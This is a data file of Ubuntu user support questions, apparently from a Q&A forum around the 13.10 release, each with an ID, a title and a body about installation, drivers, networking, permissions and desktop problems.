366062	is there a way to install without cd ?	i am trying to install a newer ubuntu on my computer , as mine is outdated . when the notification appears telling me to update , i click update and it says can not connect to internet.so i am trying to see if there is a way to install a newer version without using a cd . is that possible ?
366064	unity global menu bar over ssh ( forwarded x11 )	i 've got a small nas server running debian wheezy and a desktop ubuntu 13.10 . now i 'm running quodlibet music player remotely on the nas ( with audio forwarded to the desktop using pulse server : - ) ) . so far so good . to make it completely transparant , i 'd like to see the integration of the remote window with unity 's global menu bar . possible ? if so , hints ? thanks ! luite .
366066	can we install ubuntu 4.10 on virtualbox ?	anyone has a idea how to install ubuntu 4.10 on virtual box ? my specs are : 4 gb ram intel core i3 64 bit @ 3.40 ghz windows 8 64 bit dell inspiron 660s it is just because of curiosity.another thing is i like testing out any os with a graphical interface . and if you can , please provide a download link .
366068	get rid of old repos ?	i 'm using saucy : ~ : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy but when i do sudo apt-get update ubuntu still looks at the raring : hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //ppa.launchpad.net raring/main i386 packages that 's strange ... i definetely do n't have in /etc/apt/sources.list , but there 's a lot of raring stuff in /etc/apt/sources.list.d/ . how do i remove it ? ( i think it longers my updates )
366069	uninstall ubuntu from windows 7 ?	i installed ubuntu 12.04 on my windows 7 ( in c drive ) .i didnt create any partition.. but unfortunately i deleted ubuntu folder in c drive ( remember not uninstalled ) .so how should i remove ubuntu option on startup ? ? ? thnx in advance
366071	how do i know i 'm using kubuntu ?	i installed kubuntu image long time ago , and did several release upgrades since that . i have package kubuntu-full installed , and boot into kde . currently it looks like i 'm using ubuntu : ~ : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy there 's not a single kubuntu word in my /etc/apt/sources.list , or is it kubuntu = ubuntu - unity + kde now ? for example there 's a pre-alpha ubuntu thar already , but no kubuntu one . would i get kubuntu thar , by installing ubuntu thar in the way mentioned above ? probably kubuntu team now are the guys responsible for kde working in ubuntu .
366072	ubuntu on a usb wont load computer says remove media device	ok so i have the iso its to big for the cd roms i own and i put on usb changed boot up to the usb . but it says remove media device and pres enter when i do that it starts windows normal i have reformatted the usb and still the same . i have re downloaded the iso tried both for the 2 gig ram and its just keep on saying remove media device and press enter . only thing i have left to do is put both iso on the thumb drive and try that .
366073	reinstalling new distribution	i had the interrupt my freezed distribution upgrade , blocked on `` configuration of libthai-data '' . i now seem to have a sort of hybrid version , and i fear it thinks it 's upgraded ( lsb_release -a gives the last version ) . is there a way to : - make it restart the upgrade to the last version ( which i 'd prefer ) , or - excecute the downgrade to the previous one ?
366075	file-roller permissions	anytime i try to uncompress a file using file-roller , it always says that it is unable to do that because of a problem of permissions . a window shows : `` error setting owner : operation not permitted '' if i try to uncompress by console , it works fluently . is there a way to know what is causing the error ? oops , it 's a bug : https : //bugzilla.gnome.org/show_bug.cgi ? id=709932
366081	keep on getting this message	dpkg : error processing xserver-common-lts-raring ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : xserver-common-lts-raring e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i fix this ?
366082	ubuntu usb boot memory stick - cursor black screen	i created ubuntu 13.10 live usb stick using unetbootin . upon plug into a dell laptop and boot with usb option , all i have is a blank screen with a blinking cursor infinitely . what can i do to get it working ?
366087	ubuntu 13.10 liveboot/installer loads dots , then does nothing	problem : when i load an ubuntu 13.10 ( 64-bit ) live usb / installer on my laptop , the purple ubuntu screen with the white dots appears , the dots turn orange ( indicating its loading ) , then after a few seconds the screen turns completely black and nothing else happens . i can not install ubuntu 13.10 on this computer . what i 've tried : i 've re-downloaded the .iso file from canonical . i 've burned the .iso to the usb using the default linux usb image writer , and the windows programs yumi and linux live usb creator ; same thing happens each time . yes , i 'm sure my computer is 64 bit . i 'm currently running linux mint 15 on it , which runs perfectly . it 's a sager np7330 / clevo w230st . extra info a few months i installed ubuntu 13.04 on this machine , which installed perfectly . normally i 'd install that then dist-upgrade to 13.10 , however this computer is only a few months old and the wireless/network drivers for my network card were not implemented until kernel 3.11 ( which comes w ith 13.10 ) . i tried manually downloading kernel 3.11 and installing it ( on 13.04 ) , however the wireless card nor ethernet card still did work with ubuntu 13.04 . so my only real hope is to get 13.10 working . does anyone know what 's up with this ?
366090	how to update libsoup to the latest version	i would like to update my libsoup to the latest version as found in the launchpad for libsoup2.4 . the last time i tried to install it from source i ended up with a bricked linux system . can i update it through the package manager somehow ? i am on ubuntu 13.10
366091	how to restore missing calendar data from lightning/thunderbird	today out of nowhere all my events and tasks disappeared from my thunderbird . however , i have a full backup of .thunderbird folder . how can i restore my calendar data ? i reverted these files to previous versions : /home/me/.thunderbird/xxx.default/calendar-data/local.sqlite /home/me/.thunderbird/xxx.default/prefs.js but i still can not see any data in my thunderbird . what else should i do ?
366092	ubuntu doesn’t recognize wacom bamboo eraser	i have just connected wacom bamboo ctl-470k-rupl to my ubuntu 13.04 ( up-to-date 10/26/2013 ) . everything works fine except an eraser . more precisely , nothing happens when i try to use it ( even in gimp with preferences → input devices → eraser configured ) . $ sudo dpkg-reconfigure xserver-xorg-input-wacom doesn’t help either . how should i re-configure my wacom tablet to enable eraser ? thanks in advance .
366093	wifi inoperational despite using the tips given	i have just purchased an acer aspire v5 netbook and installed ubuntu 13.10 but i can not use wifi . my netbook is not recognising any wifi connections . i have tried uninstalling but the system says there are no drivers . what do i do
366095	ca n't install fglrx on kernel 3.11.0-12	i 'm running ubuntu gnome 13.10 on a sony vaio laptop . i tried to install the newest fglrx driver from the cchtml.com guide but no matter which version i use ( 13.4 or even 13.9 ) the installation of the generated .debs fails with this message : error ! bad return status for module build on kernel : 3.11.0-12-generic ( x86_64 ) this seems to be a confirmed bug on launchpad . currently i 'm running the radeon si driver but i really need some 3d acceleration . what is there i can do to install any version of fglrx correctly or to speed up the bug-fixing-process ? how long does the fixing of these bugs usually take ? i just discovered this patch for the driver . but i have no idea how to apply it . the explanation of the developer is not clear to me . anyone has any idea what i need to do to compile this patched version of the driver myself ?
366098	transfer data from virtual box to hard disk	how i can transfer data from virtual box 4.3 + extended pack installed in my ubuntu ? i try to connect an usb drive but i have fallen . i try with shared folders and i got same result . i need a mothod ( step by step ) .
366103	saving more corsor positions ( with tput ? ) in bash terminal	i know that tput sc saves the current cursor position and tput rc restores it exactly where tput sc was called . the problem is that every time tput sc is called , it overwrites the previous saved position . is there a way to save more positions , e.g . tput sc pos1 and tput sc pos2 which can be restored with , say , tput rc pos1 and tput rc pos2 respectively ? ( the solution need not make use of tput , i mentioned it because it 's the only command i know that handles cursor position ) if not , is there a way to at least save the cursor position locally in a function , so that if a function uses tput sc and then calls another function that runs again tput sc , then each function restores its own saved cursor position when invoking tput rc ? thanks in advance .
366105	changing in pavucontrols tab `` recording '' via command line	i 'm using pavucontrol to make changes in the `` recording '' . i 'm changing the source ( ? ? ) of a loopback to null-output from `` internes audio analog stereo '' to `` monitor of internes audio analog stereo '' see the screenshot http : //picpaste.de/bildschirmfoto_vom_2013-10-26_11_32_03-z0kwnfde.png i 'm now looking for a possibility to do this via command line . so far i 've done the following : pactl load-module module-null-sink → creates a new sink pactl load-module module-loopback → creates a new sink input pactl load-module module-loopback → creates another sink input pacmd move-sink-input 0 1 → changes the sink of the sink-input ( to null-output ) ; this is like changing manually in the pacucontrol tab `` playback '' . it 's just the last part ( making the change like shown in the screenshot ) via command line that i 'm not able to do . i 'd be very happy for any advice or suggestions . thanks already !
366106	need at jobs identified by name ( advanced atd daemon )	sometimes i 'd like to delete or overwrite ( or simply cat ) an at job . unfortunately , the at jobs are identified by a sequential number ( file in /var/spool/cron/atjobs ) , which makes those operations complicated . is there a way , probably an advanced atd daemon ( or another general scheduler ) , which makes it possible to identify the jobs by name ? i look for a general solution , for regular linux users .
366107	how does network manager select which of the specified dns servers to use ?	i have several dns servers listed in network manager settings for my wlan0 interface ipv4 . it is however using always only one of them , which is not the first in the list . how does network manager in ubuntu select which of the specified dns servers to use ? does it try ping them etc ? is there a way to influence the order of preference for the listed dns servers ?
366108	i want to disable the usb when they logon to the domain ubuntu 12.04 server	i installed a ubuntu 12.04 server with samba and ldap configured for windows clients and now i want to disable the usb when they logon to the domain but not to the administrator . is there any solution ?
366109	full usb install not booting ?	okay i 'm puzzled and been trying to solve this for days . i 'm almost giving up on having ubuntu . i 've used zorin will no problems , full install on usb . boots up fine no issues . but i 'm trying to install ubuntu on the same usb stick . exact same options under the installer . mount point , bootloader location etc . however it will not boot with ubuntu full install . i 've tried disabling uefi boot in bios , changed boot priorities and so on . i know the stick boots as zorin has no issues . i did n't even disable uefi boot in bios and zorin boots up fine .
366115	problem in games like torcs and trigger	problem in games like torcs and trigger actually , i am not able to control it properly in ubuntu . earlier , in debian , it worked fine . i find that my turns are too much responsive and i am not able to drive properly
366117	unity integration with hud and top bar	i 've got problem with unity web apps . fresh install . got chromium and ubuntu . when i go on facebook or gmail , ect. , browser ask mi to install that webapp . i 've installed it . only thing after installing is that i 've got launcher on left . there 's no integration with hud or messaging menu on top unity bar . why ? how can i fix that ?
366118	12.04 - unable to install on toshiba laptop	i having problem to install ubuntu 12.04 lts on my toshiba laptop preloaded with windows 7 . it fails to install using windows installer after downloading files , i tried to reinstall it and it still refused .
366120	knowing how much energy my computer consumes per houre	is there a way to find out how much energy my computer is using ? my friend tells me that ubuntu has a 'power statistics ' application to do this . is this correct and if so how do i use it ?
366121	kdevelop not working properly after upgrading to ubuntu 13.10	after upgrading to ubuntu 13.10 , which upgraded kdevelop to 4.5.1 , i see the following error when i start kdevelop : could not start process can not talk to klauncher : the name org.kde.klauncher was not provided by any .service files . this is followed by another error : unable to load the project file /home/drew/foo/some-project.kdev4 the filesystem panel is not populated : ... and the file open dialog shows no files or folders : under ubuntu 13.04 , i 'd upgraded to a newer version of kdevelop than the default repositories has ( 4.3.x i believe ) and i had to run kdevelop as root in order to make it work correctly . is it possible that a file was created as the root user , which now causes this problem ? i do n't know where else to look .
366122	current ssh session encryption information	after connecting to ssh server with putty or from terminal how can i view current encryption info ? that is i want to know what key exchange , cipher and mac was selected for the session .
366125	no wifi connection on dell inspiron 1520	i 'm new with ubuntu and for last few days i 'm trying to enable wifi on my dell inspiron 1520 . i found file b43 and i moved it to /lib/firmware then i put in terminal sudo modprobe b43 but through next 2h nothing happened . how long i should wait to process this command ? did i do something wrongly ? i need help with this problem , thanks in advance , rob
366129	in 13.10 `` unlock from launcher '' option is n't working	i 'm quite new here in ubuntu and i 've updated from 13.04 to 13.10 yesterday and i 've noticed that when i install new applications from software center it stays in the unity launcher and i ca n't remove `` like in 13.04 '' by pressing `` right click '' and then `` do n't stay in launcher '' . this option is not working . could you please let me know how can i remove unwanted applications in the launcher ? i 've restarted more than 2 times without luck .
366130	ubuntu 12.04 installation errors	first of all i know there are a hundred duplicates of this question but i tried everything that is written on these posts and the guides refrenced by them but i havnt succeeded yet . i will try to give as many details for best diagnosing of the problem . i just got a new lenovo thinkpad with pre installed windows 8 64 bit in legacy mode . i tried many installations and method but got the same error everytime : i downloaded and installed wubi on the same partition with windows and got the `` no root file system detected '' on first run of ubuntu . i installed wubi on a different partition which i created and formatted in windows and got the same error . next , i created a livecd with ubuntu 12.04.3 desktop amd 64 and booted after coniguring the bios ( uefi mode , safe boot disabled and quick boot disabled ) and the installation didnt detect windows 8. next , i tried to install ubuntu on legacy mode and the installation didnt detect windows 8. after all installation attempts i figured from posts in this site that i should partition with `` gparted '' . after burning and booting gparted also didnt detect any partition , it just showed 750gb of unallocated space and no partitions any one knows what is the problem ? thx in advance .
366131	how to update ubuntu from terminal using tor ?	my college has a download limit , so i am not able to update my system . can i use tor to download updates ?
366135	how to search for packages that provides a virtual package ?	how to search for packages that provides a virtual package ? for example , i want to search for packages that provides `` x-terminal-emulator '' in the `` main '' repository of ubuntu 12.04 . one way to do this is to parse the package index : curl http : //archive.ubuntu.com/ubuntu/dists/precise/main/binary-amd64/packages.gz | zcat | grep -b12 '^provides : x-terminal-emulator ' | grep ^package : which gives me the following results : package : gnome-terminal package : konsole package : xterm is there a better ( and cleaner ) way to do this ? can it be done with any of the official tools ( apt-get/apt-cache/etc ) ?
366138	problem : suspend no longer works on my laptop after 13.04 - > 13.10 upgrade	my samsung chronos-700z7c ca n't suspend after 13.04 - > 13.10 upgrade . ubuntu : 13.10 - 64-bit processor : intel® core™ i7-3635qm cpu @ 2.40ghz × 8 memory : 11.4 gib graphics : intel® ivybridge mobile ( i 'm using the intel graphical driver in its standard-mode - nvidia driver is not installed ) . this line is also recorded every fifth second in the syslog during normal operation : oct 26 12:25:33 peter-700z7c kernel : [ 4819.470524 ] nouveau w [ pfifo ] [ 0000:01:00.0 ] unknown status 0x00000100 the syslog shows failing suspend by pgraph : oct 26 12:19:19 peter-700z7c kernel : [ 4438.075682 ] nouveau w [ pfifo ] [ 0000:01:00.0 ] unknown status 0x00000100 oct 26 12:19:19 peter-700z7c kernel : [ 4440.075173 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] playlist 0 update timeout oct 26 12:19:19 peter-700z7c kernel : [ 4442.072177 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] channel 1 kick timeout oct 26 12:19:19 peter-700z7c kernel : [ 4442.072178 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] [ 0xc000a06f ] [ ffff880320b23840 ] failed to detach pgraph context , -16 oct 26 12:19:19 peter-700z7c kernel : [ 4442.072179 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] [ 0x0300e014 ] [ ffff88032d6fd800 ] failed suspend , -16 oct 26 12:19:19 peter-700z7c kernel : [ 4442.072180 ] nouveau w [ pgraph ] [ 0000:01:00.0 ] [ 0x0000902d ] [ ffff88032b4dfc40 ] parent failed suspend , -16 oct 26 12:19:19 peter-700z7c kernel : [ 4442.072233 ] nouveau e [ drm ] 0xcccc0000:0x80000007 suspend failed with -16 oct 26 12:19:19 peter-700z7c kernel : [ 4442.072234 ] nouveau e [ drm ] 0xdddddddd:0xcccc0000 suspend failed with -16 oct 26 12:19:19 peter-700z7c kernel : [ 4442.072234 ] nouveau e [ drm ] 0xffffffff:0xdddddddd suspend failed with -16 oct 26 12:19:19 peter-700z7c kernel : [ 4442.072235 ] nouveau e [ drm ] 0xffffffff:0xffffffff suspend failed with -16 oct 26 12:19:19peter-700z7c kernel : [ 4442.074779 ] nouveau w [ pfifo ] [ 0000:01:00.0 ] unknown status 0x00000100 oct 26 12:19:19 peter-700z7c kernel : [ 4444.071726 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] playlist 0 update timeout oct 26 12:19:19 peter-700z7c kernel : [ 4444.071769 ] nouveau [ drm ] resuming display ... thanks / breinholm
366142	mdadm automount	i have a system running ubuntu 13.10 , booting from a 50gb ssd . attached to the motherboard are also three 2tb disks . configured into a 4tb raid array . after ubuntu boots , i can mount the rad volume successfully with : sudo mount /dev/vg1/lv1 /data after which i can access the files in the array in /data i am uncertain as to how to get this mounting process to happen automatically during booting , however . i tried the `` disks '' gui program without success . i have seen posts mentioning how i should edit fstab and/or mdadm.conf , but i have not seen any really clear instructions regarding exactly what lines to add to either of these files . i do n't remember how the three 2tb disks were setup , formatted , etc . to become a raid volume . i vaguely recall that both mdadm and logical volume manager were used , but it was a long time ago . so when i see instructions requiring me to know how the disks are formatted , i am stuck . all i really know for sure is that the above command works . any pointers to really clear , noob-level instructions for me ?
366145	how to get the ubuntu look back after installing lubuntu-desktop	i have a fresh install of ubuntu 13.10 . i wanted to try out lubuntu , so i installed the package lubuntu-desktop . everthing worked fine , i can do lubuntu sessions now , as well as normal ubuntu sessions with unity . i realized that i liked unity better . unfortunately , since i installed lubuntu-desktop my login screen and my notifications look different . how can i revert this and get my old ubuntu look back ? i already removed the package lubuntu-desktop , but it didât help . also , when i installed it , it came with a lot of packages that werenât removed when i removed lubuntu-desktop
366146	cinnamon settings panel blank after v 2.0.6	after cinnamon upgrade to 2.0.6-20131026040307-precise via synaptic , the `` cinnamon settings '' gui or window is broken . it appears blank , only showing the configuration category icons for `` appearance '' , `` preferences '' , `` hardware '' , and `` administration '' . the icons that should be within these categories are gone . i do n't know if cinnamon-control-center was removed during the last cinnamon update , but this issue began on oct. 25 . when running cinnamon-settings from terminal , several errors appear such as this : could not load screen module ; is the cinnamon-control-center package installed ? /usr/lib/cinnamon-settings/modules/cs_user.py:112 : warning : g_object_unref : assertion `g_is_object ( object ) ' failed file_icon = gio.fileicon ( ) .new ( file ) ( cinnamon-settings.py:5471 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtkmenuitem , but as a gtkbin subclass a gtkmenuitem can only contain one widget at a time ; it already contains a widget of type gtkaccellabel could not find network module ; is the cinnamon-control-center package installed ? cinnamon-control-center is not installed in synaptic , and when the module is marked for installation , unity is selected for removal . is there any way to get this function back without removing unity ? release : ubuntu 12.04 ( precise ) kernel : 3.2.0-55-generic desktop : cinnamon 2.0.6-20131026040307-precise some settings are still accessible through terminal by appending the name of the function to the command : cinnamon-settings panel cinnamon-settings calendar cinnamon-settings themes cinnamon-settings applets cinnamon-settings windows cinnamon-settings fonts cinnamon-settings hotcorner
366147	power consuming by power statistics	does the power axis in power-time curve in 'power statistics ' application denotes to watt per hour ?
366151	error message : `` this kernel requires an x86-64 cpu but only detected an i686 cpu ''	i have already activated the amd virtualization option in the bios , but i continue to see the error . my processor is 64-bit compatible . ps . : hi , i want to tell everyone that i found my mistake . i am installing it in virtual box and i was selected ubuntu instead of ubuntu 64 bit . it seems stupid but this selection is hiiden . have a nice day .
366152	setting up vsftpd and shorewall	i 've been trying all morning to get this to work . i 've set up vsftpd using a guide i found here . i 'm also using shorewall and i 'm having a problem with my rules ( i think ) as i ca n't connect to the server at all . i 've tried using a port scanning tool and it 's telling me that the port 20 is n't open at all , even though in my rules it 's saying it 's working . accept $ fw net icmp http/accept net $ fw ssh/accept net $ fw accept net $ fw tcp 999 accept net $ fw 20 if anyone could point me in the right direction i 'd be very grateful ! : ) thank you .
366153	ubuntu installer is not detecting windows and existing partitions	while instlling ubuntu 12.04/13.04 the installer doesnt detect my partitions and my windows 7 os , so i cant install them side by side . i create through windows tool the partition d but i cant see it . in home screen of ubuntu ( while i 'm `` trying ubuntu '' ) i can see the partitions . i tried to use wubi as well , but i got an error message that `` image file not found '' or something like that . please help me with instructions what do i need to do . i 'm new with ubuntu and all the partitions issue . thanks !
366154	ask for password when starting dconf	i 'd like to have a password request whenever someone tries to start the dconf editor . is there any possilility to achieve this ?
366155	problem while installing ubuntu after bios update	i 've used ubuntu 12.04 till january 2013 side by side with windows 8 , then my hdd got burnt . i had to buy a new hdd . before installing new hdd my technician updated my bios . after that i can not install any version of ubuntu either side by side with windows 8 or a fresh install . when i boot ubuntu from a dvd or a pendrive i can use the live session but when i try to install it pc restarts . it happens so fast that i can not read the message on the black screen . my pc configuration as follows processor intel core 2 quad q6600 motherboard intel corporation dg45id ( lga775 ) hard drive 500gb toshiba dt01aca050 ram 4gb ( 2gb 800mhz+ 2gb 667mhz ) what would be my solution ?
366161	no network after installing the new ubuntu 13.10	installed the new version , having trouble engaging the network . i can not sign on to the internet . do i need to go find the wireless adapters for my laptop ?
366163	sftp can view directory but can not write	i have setup sftp and i am trying to jail the user in a specific directory . currently the user can login , and view the jailed directory . however , they can not view , write or modify any files . a bit of background : folder for user : /home/ftp/user folder permissions : 755 for /home/ftp/user 755 for /home/ftp folder is owned by root . whenever i change the user from root to anything else or the permission level , i get blocked from logging in . please help , i 've searched for answers but have not found something that solves mine !
366165	installing sopcast in ubuntu	i 'm new to ubuntu and i 'd like to install sopcast . i do n't want to install it in wine , but i have found a ppa ferramroberto/sopcast . is there a way to find out whether it 's safe to add this ppa ? i do n't know how to be sure whether to trust it or not . i guess it 's safe , but maybe someone can confirm it ! thanks !
366166	suggest me which version ubuntu is to download for my system configuration	i want to buy a netbook with the following configuration . its comes with free dos , so i want to install ubntu on this ( as ubuntu requires less system configuration compared to windows ) . i am newbie here give me suggestion about which version should i download and can i go for 32-bit or 64-bit.please suggest me the best one which is suitable for the below configuration . my requirements is browsing internet and it not hang in middle . processor processor -celeron dual core variant 847 chipset - mobile hm70 express brand - intel clock speed - 1.1 ghz cache - 2 mb memory system memory - 2gb ddr3 storage hardware interface - sata rpm - 5400 hdd capacity - 320 gb platform operating system - free dos system architecture - 64-bit
366168	change mouse popup position - ubuntu 13.10	is is possible to change the popup position after a right click ? everytime i make a right click a new terminal opens edit changed the position ( search for `` popup '' ) in /usr/share/gnome-terminal/terminal.xml and its much better now . ty !
366171	evolution error failed to append to local sent folder	i tried to send a 2mg photo using evolution and got this error message : failed to append to local `sent ' folder : can not append message to mbox file : /home/chris/.evolution/mail/local/sent : file too large have never had this before , how do resolve the problem ?
366174	can i install ubuntu 12.04 lts on a samsung np300e5x-s01 ?	i want to buy a laptop , but i want to use it with ubuntu ! so , can i install it on the samsung np300e5x-s01 ? thanks ! specifications processor : brand/family : intel core i5-3210m cpu speed : 2.5ghz cache memory : 3mb turbo boost : 3.1ghz '' ram '' memory : ram type : ddr3 installed ram : 4gb ram fsb speed : 1600mhz ram up to : 8gb drives : hard drive type : hdd hard drive capacity : 500gb rotational speed ( rpm ) : 5400rpm hard drive connection : sata cd/dvd drive : dvd super multi dl memory card reader : sd , sdhc , sdxc card reader graphic card : vga brand : nvidia vga model : geforce gt 610m vga dedicated memory : 1gb vga memory type : ddr3 screen : screen type : led backlight screen resolution : 1366x768px screen size : 15.6inch high definition : hd internet : bluetooth : bluetooth v 4.0 lan : 10/100/1000 base-t ethernet wifi : wifi 802.11 b/g/n interface : usb : 3xusb 2.0 hdmi : 1xhdmi vga/out : yes audio ports : yes multimedia : speaker : yes web camera : 1.3mp microphone : yes touch pad : yes software : operating system : freedos battery : battery tech/cells : 6-cell lithium-ion charger : ac power adapter
366176	how do i upgrade my ubuntu touch preview to ubuntu touch ?	i use galaxy nexus with ubuntu touch preview ( the absolute first version ) installed . i use saucy salamander as desktop . hos do i install the newer ubuntu touch on it ? ( i 've got no backup ) . do i need to reinstall android ? i want easy copy/paste terminal commands that i can follow .
366177	ubuntu 12.04.3 installation on a dos netbook	i am planning to buy an asus netbook with the following configuration : asus 1015e-cy041d memory : 2 gb hdd 320gb clock speed : 64bit processor : celeron dual core 847 dos i have also created a bootable usb using universal usb installer for ubuntu 12.04.3 can i use this to install ubuntu on the netbook without having windows installed on it ? ?
366181	make available internet connected by sudo user to other users	i have a huvawei net setter running on ubuntu 12.04.i have installed the mobile partner and successfully connects to the internet.the mobile partner is to be run as root so as to establish a connection.thus i am able to browse only using my su account , that is sudo firefox.the connection is not available to any other user . how can i tackle this , as i have been advised against browsing as sudo . i would like to make my connection available to all users .
366182	why is the hard drive still full after deleting some files ?	i have a server running ubuntu server 12.xx . today some services stopped and i found some messages about full disk , so i ran df -h : filesystem size used disp use % /dev/mapper/ubuntu-root 455g 434g 0 100 % / udev 1,7g 4,0k 1,7g 1 % /dev tmpfs 689m 4,2m 685m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1,7g 0 1,7g 0 % /run/shm /dev/sda1 228m 51m 166m 24 % /boot overflow 1,0m 0 1,0m 0 % /tmp i tried to delete some files remotely from a windows computer by right-clicking and choosing `` delete '' , but the hard drive remained full . is there a trash folder in ubuntu server ? what could be happening ?
366183	member of group sudo ca n't sudo	1 ) why ca n't i invoke sudo if one of my groups is sudo ? 2 ) also i have noticed that /etc/sudoers needs sudo privileges . sudoers.so does n't exist in /usr/lib but does in /usr/lib/sudo is this correct in 13.04 ? user @ user-desktop : ~ $ groups user user : user adm cdrom sudo dip plugdev lpadmin sambashare user @ user-desktop : ~ $ sudo sudo : effective uid is not 0 , is sudo installed setuid root ? user @ user-desktop : ~ $ who am i user pts/0 2013-10-24 08:54 ( :0.0 ) user @ user-desktop : ~ $ update : the response to lsb_release -a ; id ; sudo whoami was fred @ fred-desktop : ~ $ lsb_release -a ; id ; sudo whoami no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring uid=1000 ( fred ) gid=1000 ( fred ) groups=1000 ( fred ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,108 ( lpadmin ) ,124 ( sambashare ) sudo : effective uid is not 0 , is sudo installed setuid root ? fred @ fred-desktop : ~ $ but i have also found my password has been corrupted see below fred @ fred-desktop : ~ $ passwd fred changing password for fred . ( current ) unix password : passwd : authentication token manipulation error passwd : password unchanged fred @ fred-desktop : ~ $ su password : su : authentication failure fred @ fred-desktop : ~ $ i know i typed my password correctly and i do n't know su password i booted in recovery mode ran fsck to set permissions to read/write and then root cli and reset password for fred to what it had been then rebooted but the error messages remain the same ! !
366187	ubuntu 12.04 lts laptop overheating	i recently installed ubuntu 12.04.3 lts on a hp pavillion g6 laptop with quad core i5 processors , 4gb ram , a hybrid graphics of intel and radeon 6400m . the laptop is generating too much of heat , what should i be doing ? this is a completely fresh installation , and i did not install any other driver in the system yet .
366191	ubuntu 13.04 `` low graphics mode ''	i tried to install nvidia drivers ( geforce gt-540m ) , when i rebooted the unity dash disappeared , i kept trying fixed posted before then the `` low graphics '' error message appeared , my conclusion is that the nvidia card is either damaged or not installed correctly ( i disassembled the laptop once ) .been trying to install the old graphic driver ( intel graphics card 3000 ) back but the same error still exist
366198	kubuntu 13.10 : screensaver consumes lots of cpu even after done	after upgrading from kubuntu 13.04 to 13.10 , i 'm finding that my screensavers are consuming about 30 % of my cpu even after they have stopped . i 've noticed this specifically with kde asciiquarium and a couple of others . the `` blank screen '' screensaver seems to work so i 've been using that as a workaround . i found this bug below which seems related but i 'm not sure if it 's the exact issue . https : //bugs.kde.org/show_bug.cgi ? id=224200 has anyone else experienced this and have a workaround ?
366199	ubuntu 13.10 adobeair application : failed to load module `` unity-gtk-module ''	i have installed adobeair on 13.10 , but am getting the following error messages when using : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' has someone faced this issue . i looked at comment giving a possible resolution here , but that did n't help , as i already have those packages installed . basically to install adobeair , being a 32-bit , i had to install various i386 packages : libgtk2.0-0 : i386 libnss3-1d : i386 libnspr4-0d : i386 lib32nss-mdns libxml2 : i386 libxslt1.1 : i386 when i run the program as root , it opens up properly without errors . but that is not an option . could it be a problem that necessary modules are not getting loaded on non-root user 's environment .
366208	launcher does n't open when switching to a new workspace	i just upgraded to ubuntu 13.10 . when i switch to a new workspace , the launcher search will not open when i hit the super key if there are no windows in the workspace . if i click on the launcher and then hit the super key , the search box will open . however if i click back on the desktop , the search will no longer open when i hit the super key . if there is a window in the workspace everything works correctly . how can i fix this ?
366211	cmus error : opening audio device : no such device	i cant seem to play any audio with cmus because it always gives the above error the output of lspci -v | grep -a7 -i `` audio '' gives 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) subsystem : asrock incorporation device c892 flags : bus master , fast devsel , latency 0 , irq 49 memory at dff00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) ( prog-if 00 [ normal decode ] ) what could be the problem ?
366218	want 13.10 to boot from external hd overiding grub installed on laptop for 13.04	i have 13.04 multi-booting with win7 on my laptop . i downloaded 13.10 and used unetbootin to make an install flash . when rebooting i booted to the flash perfectly ( test but not install mode ) . i plug in my e-sata external-hd . from 13.10 test mode i start gparted . i verify unallocated space on my external . my external is /dev/sdc . now going to the desktop i select install . when selecting where to install , i use the bottom option - something else . from the partition tool , i select the freespace on sdc and create a logical partition with ext4 file structure and a / mountpoint . than below that where it asks where i want to install the bootloader i change it from sda to sdc not to sdc6 which is the new partition i will be creating and installing ubuntu to as soon as i press continue . it installs fine then tells me to reboot . i reboot and pull the install flash out . it boots to the laptop and not to the external . i 've done this before by using an install flash and installing to another flash . then it worked perfectly but for some reason this e-sata external-hd does n't boot . did i forget something ?
366219	what does `` fully supported '' mean in context of radeon opensource video driver ?	update : this is not a request for support of my specific issue . details of that issue are here : how to recover from bad upgrade to 13.04 ( unity very slow ) . i have `` solved '' that issue , for the time being anyway , by loading alternative lighter weight desktops . this question was opened specifically to question the meaning of the documentation at https : //help.ubuntu.com/community/radeondriver . end of update there it is , in black and white : https : //help.ubuntu.com/community/radeondriver fully supported all these radeon ( hd ) cards and derivatives have good 3d acceleration support . this is not an exhaustive list : ... rv610/rv630 radeon hd 2400/2600/2700/4200/4225/4250 yet in my case ( the hd2400 ) this proves to be manifestly untrue , at least if `` fully supported '' means sufficient to run unity in ubuntu 13.04 . it runs all the applications i can launch under unity , but unity itself is unbearably slow . it 's quite striking really . click on the `` dash '' - go get a cup of coffee . type a key in the unity search box , wait five seconds for it to appear . type alt-tab and wait five seconds for the screen to finish painting . none of these issues appear outside of unity components . as you all know , there are complaints about slow performance all over the internet about unity . should n't this page somehow address this issue ? especially if `` fully supported '' does n't mean sufficiently to run the default modern ubuntu release . what does `` fully supported '' mean ?
366225	install ubuntu inside windows comes out in ubuntu cd instead of install parallelly	here 's the problem : i downloaded the ubuntu ( 12.04 lts ) image installer and burnt it on a cd . when i put it and restarted windows , instead of the `` install ubuntu alongside windows '' option shown in ubuntu instructions , came a `` install ubuntu inside windows '' ( or something similar ) . i would like to know how i can install it parallelly to windows , so that later i can uninstall windows . thank you in advance .
